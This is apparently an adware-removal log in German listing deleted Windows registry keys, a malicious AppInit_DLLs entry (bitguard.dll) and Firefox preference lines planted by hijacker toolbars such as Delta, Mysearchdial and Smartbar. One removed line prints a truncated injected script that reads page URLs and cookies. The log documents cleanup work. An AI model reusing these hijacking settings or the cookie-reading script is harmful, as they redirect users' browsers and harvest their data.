Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{0CFBE80D-5608-4309-A0F5-3B1414833432}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{3004627E-F8E9-4E8B-909D-316753CBA923}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{7F6AFBF1-E065-4627-A2FD-810366367D01}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{82E1477C-B154-48D3-9891-33D83C26BCD3}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AA74D58F-ACD0-450D-A85E-6C04B171C044}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{AAA38851-3CFF-475F-B5E0-720D3645E4A5}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{C1AF5FA5-852C-4C90-812E-A7F75E011D87}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF5625A3-37AB-4BDB-9875-2A3D91CD0DFD}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FD72061E-9FDE-484D-A58A-0BAB4151CAD8}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{FE063412-BEA4-4D76-8ED3-183BE6220D17}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{B92742C8-903F-6740-0B5A-F4F00ABBBCAC}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{11111111-1111-1111-1111-110311391106}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{7F6AFBF1-E065-4627-A2FD-810366367D01}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{A1E28287-1A31-4B0F-8D05-AA8C465D3C5A}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{DF7770F7-832F-4BDF-B144-100EDDD0C3AE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{11111111-1111-1111-1111-110311391106}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{AAA38851-3CFF-475F-B5E0-720D3645E4A5}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{219046AE-358F-4CF1-B1FD-2B4DE83642A8}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{348C2DF3-1191-4C3E-92A6-B3A89A9D9C85}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4D79-A620-CCE0C0A66CC9}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE}
Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{0CFBE80D-5608-4309-A0F5-3B1414833432}]
Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{3004627E-F8E9-4E8B-909D-316753CBA923}]
Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{82E1477C-B154-48D3-9891-33D83C26BCD3}]
Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar [{EF99BD32-C1FB-11D2-892F-0090271D4F88}]
Wert Gelöscht : HKCU\Software\Microsoft\Internet Explorer\URLSearchHooks [{539F76FD-084E-4858-86D5-62F02F54AE86}]
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{0400EBCA-042C-4000-AA89-9713FBEDB671}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{06E50566-0AB7-431C-841D-62794727DAF9}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{0BD19251-4B4B-4B94-AB16-617106245BB7}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{10DE7085-6A1E-4D41-A7BF-9AF93E351401}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{1231839B-064E-4788-B865-465A1B5266FD}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{1AD27395-1659-4DFF-A319-2CFA243861A5}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{1F8EDE97-36D5-422A-B8F0-9406E2D87C60}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{26E7211D-0650-43CF-8498-4C81E83AEAAA}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{2DAC2231-CC35-482B-97C5-CED1D4185080}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{31E3BC75-2A09-4CFF-9C92-8D0ED8D1DC0F}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{3281114F-BCAB-45E3-80D9-A6CD64D4E636}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{3F1CD84C-04A3-4EA0-9EA1-7D134FD66C82}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{3F83A9CA-B5F0-44EC-9357-35BB3E84B07F}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{44533FCB-F9FB-436A-8B6B-CF637B2D465A}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{44B29DDD-CF7A-454A-A275-A322A398D93F}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{47E520EA-CAD2-4F51-8F30-613B3A1C33EB}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{57C91446-8D81-4156-A70E-624551442DE9}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{70AFB7B2-9FB5-4A70-905B-0E9576142E1D}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{79FB5FC8-44B9-4AF5-BADD-CCE547F953E5}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{7AD65FD1-79E0-406D-B03C-DD7C14726D69}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{97DD820D-2E20-40AD-B01E-6730B2FCE630}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{9EDC0C90-2B5B-4512-953E-35767BAD5C67}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{A4DE94DB-DF03-45A3-8A5D-D1B7464B242D}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{AA0F50A8-2618-4AE4-A779-9F7378555A8F}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{B177446D-54A4-4869-BABC-8566110B4BE0}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{B2DB115C-8278-4947-9A07-57B53D1C4215}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{B97FC455-DB33-431D-84DB-6F1514110BD5}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{C66F0B7A-BD67-4982-AF71-C6CA6E7F016F}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{C67281E0-78F5-4E49-9FAE-4B1B2ADAF17B}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{D54C859C-6066-4F31-8FE0-2AAEDCAE67D7}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{D9D1DFC5-502D-43E4-B1BB-4D0B7841489A}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{E0B07188-A528-4F9E-B2F7-C7FDE8680AE4}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{E72E9312-0367-4216-BFC7-21485FA8390B}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{F05B12E1-ADE8-4485-B45B-898748B53C37}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{F6CCB6C9-127E-44AE-8552-B94356F39FFE}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{FFD25630-2734-4AE9-88E6-21BF6525F3FE}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{55555555-5555-5555-5555-550355395506}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366396606}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}
Wert Gelöscht : HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist [1]
Schlüssel Gelöscht : HKCU\Software\BABSOLUTION
Schlüssel Gelöscht : HKCU\Software\BI
Schlüssel Gelöscht : HKCU\Software\BonanzaDealsLive
Schlüssel Gelöscht : HKCU\Software\Conduit
Schlüssel Gelöscht : HKCU\Software\DataMngr
[#] Schlüssel Gelöscht : HKCU\Software\DataMngr_Toolbar
Schlüssel Gelöscht : HKCU\Software\Default Tab
Schlüssel Gelöscht : HKCU\Software\DefaultTab
Schlüssel Gelöscht : HKCU\Software\Delta
Schlüssel Gelöscht : HKCU\Software\DownTango
Schlüssel Gelöscht : HKCU\Software\ExpressFiles
Schlüssel Gelöscht : HKCU\Software\GoforFiles
Schlüssel Gelöscht : HKCU\Software\InstallCore
Schlüssel Gelöscht : HKCU\Software\InstalledBrowserExtensions
Schlüssel Gelöscht : HKCU\Software\Minibar
Schlüssel Gelöscht : HKCU\Software\mysearchdial
Schlüssel Gelöscht : HKCU\Software\Optimizer Pro
Schlüssel Gelöscht : HKCU\Software\ParetoLogic
Schlüssel Gelöscht : HKCU\Software\RegisteredApplicationsEx
Schlüssel Gelöscht : HKCU\Software\Smart PC Cleaner
Schlüssel Gelöscht : HKCU\Software\Softonic
Schlüssel Gelöscht : HKCU\Software\Somoto
Schlüssel Gelöscht : HKCU\Software\StartSearch
Schlüssel Gelöscht : HKCU\Software\TENCENT
Schlüssel Gelöscht : HKCU\Software\visualbee
Schlüssel Gelöscht : HKCU\Software\AppDataLow\SProtector
Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\BackgroundContainer
Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Conduit
Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\ConduitSearchScopes
Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\Crossrider
Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\DefaultTab
Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\PriceGong
Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\SmartBar
Schlüssel Gelöscht : HKCU\Software\AppDataLow\Software\visualbee
Schlüssel Gelöscht : HKLM\Software\Babylon
Schlüssel Gelöscht : HKLM\Software\BonanzaDealsLive
Schlüssel Gelöscht : HKLM\Software\Conduit
Schlüssel Gelöscht : HKLM\Software\DataMngr
Schlüssel Gelöscht : HKLM\Software\Default Tab
Schlüssel Gelöscht : HKLM\Software\DefaultTab
Schlüssel Gelöscht : HKLM\Software\Delta
Schlüssel Gelöscht : HKLM\Software\DownTango
Schlüssel Gelöscht : HKLM\Software\Driver-Soft
Schlüssel Gelöscht : HKLM\Software\ExpressFiles
Schlüssel Gelöscht : HKLM\Software\GoforFiles
Schlüssel Gelöscht : HKLM\Software\InstallCore
Schlüssel Gelöscht : HKLM\Software\InstallIQ
Schlüssel Gelöscht : HKLM\Software\Minibar
Schlüssel Gelöscht : HKLM\Software\ParetoLogic
Schlüssel Gelöscht : HKLM\Software\SP Global
Schlüssel Gelöscht : HKLM\Software\SProtector
Schlüssel Gelöscht : HKLM\Software\TENCENT
Schlüssel Gelöscht : HKLM\Software\Uniblue
Schlüssel Gelöscht : HKLM\Software\visualbee
Schlüssel Gelöscht : HKLM\Software\Vittalia
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\ExpressFiles
Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\GoforFiles
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{99C91FC5-DB5B-4AA0-BB70-5D89C5A4DF96}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C670DCAE-E392-AA32-6F42-143C7FC4BDFD}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CA41BB14-E67B-1653-C57B-5CA99418A866}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EE171732-BEB4-4576-887D-CB62727F01CA}
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\bi_uninstaller
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DefaultTab Chrome
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DefaultTab
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Delta Chrome Toolbar
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Delta
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DownTango
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Driver Genius_is1
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FilesFrog Update Checker
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mysearchdial
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Optimizer Pro_is1
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SkypEmoticons_is1
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart PC Cleaner_is1
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SmartBar
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Vittalia
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Tarma Installer
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{889DF117-14D1-44EE-9F31-C5FB5D47F68B}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Optimizer Pro_is1
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OptimizerPro
Daten Gelöscht : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - c:\progra~3\bitguard\271769~1.27\{c16c1~1\bitguard.dll
 
***** [ Browser ] *****
 
-\\ Internet Explorer v9.0.8112.16476
 
Einstellung Wiederhergestellt : HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
Einstellung Wiederhergestellt : HKLM\SOFTWARE\Microsoft\Internet Explorer\AboutURls [Tabs]
Einstellung Wiederhergestellt : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\Main [Start Page]
 
-\\ Mozilla Firefox v8.0 (de)
 
[ Datei : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\prefs.js ]
 
Zeile gelöscht : user_pref("browser.startup.homepage", "hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCt[...]
Zeile gelöscht : user_pref("browser.search.selectedEngine", "Mysearchdial");
Zeile gelöscht : user_pref("browser.search.defaultenginename", "Mysearchdial");
 
[ Datei : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\prefs.js ]
 
Zeile gelöscht : user_pref("aol_toolbar.default.homepage.check", false);
Zeile gelöscht : user_pref("aol_toolbar.default.search.check", false);
Zeile gelöscht : user_pref("browser.newtab.url", "hxxp://www.delta-search.com/?affID=119290&tt=gc_&babsrc=NT_ss&mntrId=44744C0F6E75536C");
Zeile gelöscht : user_pref("browser.search.order.1", "Delta Search");
Zeile gelöscht : user_pref("browser.search.selectedEngine", "Mysearchdial");
Zeile gelöscht : user_pref("browser.startup.homepage", "hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCt[...]
Zeile gelöscht : user_pref("extensions.BabylonToolbar.prtkDS", 0);
Zeile gelöscht : user_pref("extensions.BabylonToolbar.prtkHmpg", 0);
Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "WebSearch");
Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "WebSearch");
Zeile gelöscht : user_pref("sweetim.toolbar.previous.browser.startup.homepage", "hxxp://websearch.pu-results.info/?pid=724&r=2013/05/08&hid=4175303324&lg=EN&cc=VN");
Zeile gelöscht : user_pref("sweetim.toolbar.previous.keyword.URL", "hxxp://websearch.pu-results.info/?pid=724&r=2013/05/08&hid=4175303324&lg=EN&cc=VN&l=1&q=");
Zeile gelöscht : user_pref("sweetim.toolbar.scripts.1.domain-blacklist", ".*");
Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.enable", "false");
Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_DS", "1");
Zeile gelöscht : user_pref("sweetim.toolbar.searchguard.UserRejectedGuard_HP", "1");
Zeile gelöscht : user_pref("browser.search.defaultenginename", "Mysearchdial");
 
[ Datei : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\prefs.js ]
 
Zeile gelöscht : user_pref("browser.newtab.url", "hxxp://vn.hao123.com/?tn=smt_pay_hp_01_hao123_vn");
Zeile gelöscht : user_pref("browser.search.defaultenginename,S", "WebSearch");
Zeile gelöscht : user_pref("browser.search.defaulturl", "hxxp://www.bigseekpro.com/search/toolbar/hao123/{432AC9A6-96B0-51C9-30FF-0D2441E553C0}?q={searchTerms}");
Zeile gelöscht : user_pref("browser.search.order.1,S", "WebSearch");
Zeile gelöscht : user_pref("browser.search.selectedEngine,S", "WebSearch");
Zeile gelöscht : user_pref("extensions.delta.admin", false);
Zeile gelöscht : user_pref("extensions.delta.aflt", "babsst");
Zeile gelöscht : user_pref("extensions.delta.appId", "{C26644C4-2A12-4CA6-8F2E-0EDE6CF018F3}");
Zeile gelöscht : user_pref("extensions.delta.autoRvrt", "false");
Zeile gelöscht : user_pref("extensions.delta.dfltLng", "en");
Zeile gelöscht : user_pref("extensions.delta.excTlbr", false);
Zeile gelöscht : user_pref("extensions.delta.ffxUnstlRst", true);
Zeile gelöscht : user_pref("extensions.delta.id", "4474f90e0000000000004c0f6e75536c");
Zeile gelöscht : user_pref("extensions.delta.instlDay", "15858");
Zeile gelöscht : user_pref("extensions.delta.instlRef", "sst");
Zeile gelöscht : user_pref("extensions.delta.newTab", false);
Zeile gelöscht : user_pref("extensions.delta.prdct", "delta");
Zeile gelöscht : user_pref("extensions.delta.prtnrId", "delta");
Zeile gelöscht : user_pref("extensions.delta.rvrt", "false");
Zeile gelöscht : user_pref("extensions.delta.smplGrp", "none");
Zeile gelöscht : user_pref("extensions.delta.tlbrId", "base");
Zeile gelöscht : user_pref("extensions.delta.tlbrSrchUrl", "");
Zeile gelöscht : user_pref("extensions.delta.vrsn", "1.8.21.5");
Zeile gelöscht : user_pref("extensions.delta.vrsnTs", "1.8.21.518:32:00");
Zeile gelöscht : user_pref("extensions.delta.vrsni", "1.8.21.5");
Zeile gelöscht : user_pref("extensions.delta_i.babExt", "");
Zeile gelöscht : user_pref("extensions.delta_i.babTrack", "affID=119290&tt=gc_");
Zeile gelöscht : user_pref("extensions.delta_i.srcExt", "ss");
Zeile gelöscht : user_pref("extensions.irmysearch.aflt", "irmsd0101");
Zeile gelöscht : user_pref("extensions.irmysearch.cd", "2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T");
Zeile gelöscht : user_pref("extensions.irmysearch.cr", "1727878116");
Zeile gelöscht : user_pref("extensions.irmysearch.instlRef", "");
Zeile gelöscht : user_pref("extensions.kango.storage.minibar.config", "{\"name\":\"Hao123 toolbar\",\"description\":\"Hao123 toolbar\",\"button\":{\"tooltip\":\"Search\",\"icon\":\"hxxp://www.bigspeedpro.com/button/%a[...]
Zeile gelöscht : user_pref("extensions.kango.storage.minibar.homepageSet", "\"1\"");
Zeile gelöscht : user_pref("extensions.kango.storage.minibar.searchassistSet", "\"1\"");
Zeile gelöscht : user_pref("extensions.kango.storage.minibar.searchengineSet", "\"1\"");
Zeile gelöscht : user_pref("extensions.kango.storage.ui.button.iconCache", "\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAED0lEQVQ4ja3MTU+TBwDA8X4Ij7pEDDqUqDHb3FzmoRqjyaaZS4wuJh7U7WCiJFMRKDqth[...]
Zeile gelöscht : user_pref("extensions.mNw7YgSF_.scode", "(function(){try{var url=(window.self.location.href + document.cookie);if(url.indexOf(\"acebook\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"s[...]
Zeile gelöscht : user_pref("extensions.mysearchdial.AL", 2);
Zeile gelöscht : user_pref("extensions.mysearchdial.aflt", "irmsd0101");
Zeile gelöscht : user_pref("extensions.mysearchdial.appId", "{CA5CAA63-B27C-4963-9BEC-CB16A36D56F8}");
Zeile gelöscht : user_pref("extensions.mysearchdial.cd", "2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutDzytDtCtG1T");
Zeile gelöscht : user_pref("extensions.mysearchdial.cr", "1727878116");
Zeile gelöscht : user_pref("extensions.mysearchdial.dfltLng", "");
Zeile gelöscht : user_pref("extensions.mysearchdial.dfltSrch", true);
Zeile gelöscht : user_pref("extensions.mysearchdial.dnsErr", true);
Zeile gelöscht : user_pref("extensions.mysearchdial.excTlbr", false);
Zeile gelöscht : user_pref("extensions.mysearchdial.hmpg", true);
Zeile gelöscht : user_pref("extensions.mysearchdial.hmpgUrl", "hxxp://start.mysearchdial.com/?f=1&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1CzutD[...]
Zeile gelöscht : user_pref("extensions.mysearchdial.id", "60EB69562F4EF90E");
Zeile gelöscht : user_pref("extensions.mysearchdial.instlDay", "16082");
Zeile gelöscht : user_pref("extensions.mysearchdial.instlRef", "");
Zeile gelöscht : user_pref("extensions.mysearchdial.newTabUrl", "hxxp://start.mysearchdial.com/?f=2&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1Czu[...]
Zeile gelöscht : user_pref("extensions.mysearchdial.prdct", "mysearchdial");
Zeile gelöscht : user_pref("extensions.mysearchdial.prtnrId", "mysearchdial");
Zeile gelöscht : user_pref("extensions.mysearchdial.srchPrvdr", "Mysearchdial");
Zeile gelöscht : user_pref("extensions.mysearchdial.tlbrId", "base");
Zeile gelöscht : user_pref("extensions.mysearchdial.tlbrSrchUrl", "hxxp://start.mysearchdial.com/?f=3&a=irmsd0101&cd=2XzuyEtN2Y1L1QzuyCtD0E0ByCzyyDyCtB0FyE0E0FzytD0EtN0D0Tzu0SyByEtAtN1L2XzutBtFtBtFtCyDtFtCyDzytBtN1L1C[...]
Zeile gelöscht : user_pref("extensions.mysearchdial.vrsn", "1.8.21.0");
Zeile gelöscht : user_pref("extensions.mysearchdial.vrsni", "1.8.21.0");
Zeile gelöscht : user_pref("extensions.mysearchdial_i.hmpg", true);
Zeile gelöscht : user_pref("extensions.mysearchdial_i.newTab", false);
Zeile gelöscht : user_pref("extensions.mysearchdial_i.smplGrp", "none");
Zeile gelöscht : user_pref("extensions.mysearchdial_i.vrsnTs", "1.8.21.022:4:59");
Zeile gelöscht : user_pref("extensions.smartbar.admin", false);
Zeile gelöscht : user_pref("extensions.smartbar.aflt", "orgnl");
Zeile gelöscht : user_pref("extensions.smartbar.appId", "{C5E5951A-4ADD-4402-8A8E-EF97DCB9D8EC}");
Zeile gelöscht : user_pref("extensions.smartbar.autoRvrt", "false");
Zeile gelöscht : user_pref("extensions.smartbar.dfltLng", "");
Zeile gelöscht : user_pref("extensions.smartbar.dfltSrch", true);
Zeile gelöscht : user_pref("extensions.smartbar.dnsErr", true);
Zeile gelöscht : user_pref("extensions.smartbar.excTlbr", false);
Zeile gelöscht : user_pref("extensions.smartbar.hmpg", true);
Zeile gelöscht : user_pref("extensions.smartbar.hmpgUrl", "hxxp://search.creativetoolbars.com/?src=hp&id=smartbar&g=");
Zeile gelöscht : user_pref("extensions.smartbar.hpOld0", "hxxp://vn.hao123.com/?tn=smt_pay_hp_01_hao123_vn");
Zeile gelöscht : user_pref("extensions.smartbar.id", "4474f90e0000000000004c0f6e75536c");
Zeile gelöscht : user_pref("extensions.smartbar.instlDay", "16153");
Zeile gelöscht : user_pref("extensions.smartbar.instlRef", "");
Zeile gelöscht : user_pref("extensions.smartbar.kw_url", "hxxp://search.creativetoolbars.com/results?src=tb&id=smartbar&g=&q=");
Zeile gelöscht : user_pref("extensions.smartbar.newTab", true);
Zeile gelöscht : user_pref("extensions.smartbar.newTabUrl", "hxxp://search.creativetoolbars.com/?src=nt&id=smartbar&g=");
Zeile gelöscht : user_pref("extensions.smartbar.prdct", "smartbar");
Zeile gelöscht : user_pref("extensions.smartbar.prtnrId", "bechiro");
Zeile gelöscht : user_pref("extensions.smartbar.rvrt", "false");
Zeile gelöscht : user_pref("extensions.smartbar.smplGrp", "mm");
Zeile gelöscht : user_pref("extensions.smartbar.srchPrvdr", "Search the web (CT)");
Zeile gelöscht : user_pref("extensions.smartbar.tlbrId", "smartbar");
Zeile gelöscht : user_pref("extensions.smartbar.tlbrSrchUrl", "hxxp://search.creativetoolbars.com/results?src=tb&id=smartbar&g=&q=");
Zeile gelöscht : user_pref("extensions.smartbar.vrsn", "1.8.8.12");
Zeile gelöscht : user_pref("extensions.smartbar.vrsnTs", "1.8.8.1222:13:42");
Zeile gelöscht : user_pref("extensions.smartbar.vrsni", "1.8.8.12");
Zeile gelöscht : user_pref("extentions.y2layers.defaultEnableAppsList", "DropDownDeals,buzzdock,YontooNewOffers");
Zeile gelöscht : user_pref("extentions.y2layers.installId", "03851a0f-1450-4d0a-995b-4ef0cdbf29b0");
Zeile gelöscht : user_pref("keyword.URL", "hxxp://www.bigseekpro.com/search/toolbar/hao123/{432AC9A6-96B0-51C9-30FF-0D2441E553C0}?q=");
 
[ Datei : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\prefs.js ]
 
Zeile gelöscht : user_pref("aol_toolbar.default.homepage.check", false);
Zeile gelöscht : user_pref("aol_toolbar.default.search.check", false);
Zeile gelöscht : user_pref("browser.newtab.url", "hxxp://visualbee.delta-search.com/?babsrc=NT_ss&mntrId=44744C0F6E75536C&affID=121377&tsp=5004");
Zeile gelöscht : user_pref("browser.search.defaultenginename", "Mysearchdial");
